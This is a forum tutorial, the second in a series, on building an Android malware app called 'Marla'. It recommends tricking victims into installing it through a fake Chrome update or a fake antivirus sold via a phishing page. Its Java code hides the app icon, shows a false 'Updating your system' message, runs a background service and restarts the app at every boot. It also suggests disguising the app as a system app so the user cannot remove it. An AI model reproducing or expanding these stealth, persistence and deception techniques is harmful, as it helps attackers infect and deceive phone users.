Android Malware : A tumor called Marla 0x02

Malware
, , ,
1

A Tumor Called Marla

Hi everyone, today we will cover how to hide our malware from the user and run our malware as a service.
When the Malware run for the first time it will hide the app icon from the user laucher, and run a service.
The service only query the OS version for the moment, we will be much more malicious in the next tutorial.

How to infect user ?

When the user will install the malware, we want it to be persistent.
We need to force the user to install our malware and run it but how ?

Social Engineering

Here is one of the way to force the user to download Marla
Fake Chrome update ( Everyone use chrome on android, most of the user ) or a fake antivirus ( Phishing page telling the user get 10 virus. Trick him to download your “Antivirus” :wink: )

If you choose the Antivirus way, make an app that look like a legit antivirus.
When the user will download, install the app and run it. We are good :slight_smile:

Why should we use these techniques ?

New version of android need to be run once to be able to be started at boot time and use permission ( see Android Malware for more information about permission).

Hiding app icon

Let’s start to code and hide our app icon :slight_smile:

Today our task is to disable the app component of our application here the icon. (You can start from scratch or use the old code of the previous tutorial ).

n.b : The app won’t be persistent If the user haven’t his phone rooted. The user will be able to uninstall the malware however If the android phone is rooted we can hide the app as a system app and give a name like : com.android.update, he won’t be able to uninstall system app

Main Activity

package com.android.marla;

import android.content.pm.PackageManager;
import android.support.v7.app.AppCompatActivity;
import android.os.Bundle;
import android.widget.Toast;

public class MainActivity extends AppCompatActivity {

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        PackageManager pm = this.getPackageManager();
        //The line below will hide your app icon
        pm.setComponentEnabledSetting(
                getComponentName(),
                PackageManager.COMPONENT_ENABLED_STATE_DISABLED,
                PackageManager.DONT_KILL_APP);
        //Just show a Toast
        Toast.makeText(this, "Updating your system please wait ...", Toast.LENGTH_LONG);


    }
}

Here is what you should see

Now if you kill the app after a moment.

No Marla app :smiley:

Run a service

We want a running service that can gather information. Let’s make a new class

package com.android.marla;

import android.app.Service;
import android.content.Intent;
import android.os.Handler;
import android.os.IBinder;
import android.os.Looper;
import android.support.annotation.Nullable;
import android.widget.Toast;

public class MainService extends Service{

    @Nullable
    @Override
    public IBinder onBind(Intent intent) {
        return null;
    }


    public void onCreate()
    {
        Handler handler = new Handler(Looper.getMainLooper());
        handler.post(new Runnable(){

            @Override
            public void run() {
                Toast.makeText(getApplicationContext(),"Malware started",Toast.LENGTH_LONG).show();
            }
        });
    }

}

Here I just create a Toast for PoC , here is the function

 public void onCreate()
    {
        Handler handler = new Handler(Looper.getMainLooper());
        handler.post(new Runnable(){

            @Override
            public void run() {
                Toast.makeText(getApplicationContext(),"Malware started",Toast.LENGTH_LONG).show();
            }
        });
    }

In your android Manifest add the service

<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.android.marla">
    <!--PERMISSION-->
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
    <!--PERMISSION-->
    <application
        android:allowBackup="true"
        android:icon="@mipmap/ic_launcher"
        android:label="@string/app_name"
        android:supportsRtl="true"
        android:theme="@style/AppTheme">
        <activity android:name=".MainActivity">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />

                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>
        <!-- THE SERVICE IS BELOW-->
        <service android:name=".MainService"/>
    </application>

</manifest>

Well done :slight_smile: You’ve created a service now let’s run it at boot time. ( I hope you remember the previous tutorial for this part)
Receiver :

package com.android.marla;

import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;

public class BootReceiver extends BroadcastReceiver {
    @Override
    public void onReceive(Context context, Intent intent) {
        /** if the boot is completed **/
        if(Intent.ACTION_BOOT_COMPLETED.equals(intent.getAction())){
            /** Start the MainActivity.class everytime the phone boot**/
            Intent i = new Intent(context, MainActivity.class);
            context.startActivity(i);
        }
    }
}

Well done, your application is not malicious for the moment. Your app look like an adware for the moment.

10 Likes
2

Thanks for an article! Well done!

2 Likes
3

This topic was automatically closed after 30 days. New replies are no longer allowed.